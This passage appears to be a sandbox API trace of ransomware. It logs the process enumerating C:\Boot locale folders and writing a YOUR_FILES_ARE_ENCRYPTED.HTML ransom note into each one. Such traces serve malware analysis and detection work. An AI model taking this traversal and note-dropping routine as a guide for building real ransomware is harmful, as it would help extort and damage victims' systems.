ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0104.696] StrStrIW (lpFirst="sr-Latn-RS", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.696] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS") returned 22 [0104.696] GetProcessHeap () returned 0x600000 [0104.696] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.697] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\sr-Latn-RS" | out: lpString1="\\\\?\\C:\\Boot\\sr-Latn-RS") returned="\\\\?\\C:\\Boot\\sr-Latn-RS" [0104.697] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sr-Latn-RS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sr-Latn-RS\\*") returned="\\\\?\\C:\\Boot\\sr-Latn-RS\\*" [0104.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0104.697] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.697] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.697] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.697] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 38 [0104.697] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.697] lstrlenW (lpString=".mui") returned 4 [0104.697] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.697] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.697] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0104.697] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-RS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 52 [0104.698] GetProcessHeap () returned 0x600000 [0104.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.698] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sr-latn-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.698] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.699] CloseHandle (hObject=0x300) returned 1 [0104.699] GetProcessHeap () returned 0x600000 [0104.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.699] GetProcessHeap () returned 0x600000 [0104.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.700] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0104.700] StrStrIW (lpFirst="sv-SE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.700] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0104.700] GetProcessHeap () returned 0x600000 [0104.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.701] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0104.701] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sv-SE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE\\*") returned="\\\\?\\C:\\Boot\\sv-SE\\*" [0104.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.701] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.701] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.701] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.701] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0104.701] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.701] lstrlenW (lpString=".mui") returned 4 [0104.701] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.701] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.701] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.701] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui") returned 33 [0104.702] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.702] lstrlenW (lpString=".mui") returned 4 [0104.702] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.702] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.702] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.704] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.704] GetProcessHeap () returned 0x600000 [0104.704] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.705] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sv-se\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.707] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.707] CloseHandle (hObject=0x300) returned 1 [0104.708] GetProcessHeap () returned 0x600000 [0104.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.708] GetProcessHeap () returned 0x600000 [0104.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.708] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0104.708] StrStrIW (lpFirst="tr-TR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.708] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0104.708] GetProcessHeap () returned 0x600000 [0104.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.710] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") returned="\\\\?\\C:\\Boot\\tr-TR" [0104.710] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR\\*") returned="\\\\?\\C:\\Boot\\tr-TR\\*" [0104.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.711] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.711] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.711] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.711] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0104.711] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.711] lstrlenW (lpString=".mui") returned 4 [0104.711] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.711] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.711] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.711] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui") returned 33 [0104.711] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.711] lstrlenW (lpString=".mui") returned 4 [0104.711] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.711] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.711] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.712] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.712] GetProcessHeap () returned 0x600000 [0104.712] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.712] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\tr-tr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.713] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.714] CloseHandle (hObject=0x300) returned 1 [0104.715] GetProcessHeap () returned 0x600000 [0104.715] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.715] GetProcessHeap () returned 0x600000 [0104.715] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.715] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0104.715] StrStrIW (lpFirst="uk-UA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.716] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA") returned 17 [0104.716] GetProcessHeap () returned 0x600000 [0104.716] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.717] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\uk-UA" | out: lpString1="\\\\?\\C:\\Boot\\uk-UA") returned="\\\\?\\C:\\Boot\\uk-UA" [0104.717] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\uk-UA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\uk-UA\\*") returned="\\\\?\\C:\\Boot\\uk-UA\\*" [0104.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\uk-UA\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626878 [0104.717] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.717] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.717] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.717] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 33 [0104.717] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.717] lstrlenW (lpString=".mui") returned 4 [0104.717] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.717] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.717] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0104.717] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.717] GetProcessHeap () returned 0x600000 [0104.717] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\uk-ua\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.718] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.719] CloseHandle (hObject=0x300) returned 1 [0104.719] GetProcessHeap () returned 0x600000 [0104.719] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.719] GetProcessHeap () returned 0x600000 [0104.719] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.720] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0104.720] StrStrIW (lpFirst="zh-CN", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.720] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0104.720] GetProcessHeap () returned 0x600000 [0104.720] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.721] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0104.721] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN\\*") returned="\\\\?\\C:\\Boot\\zh-CN\\*" [0104.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0104.721] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.721] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, 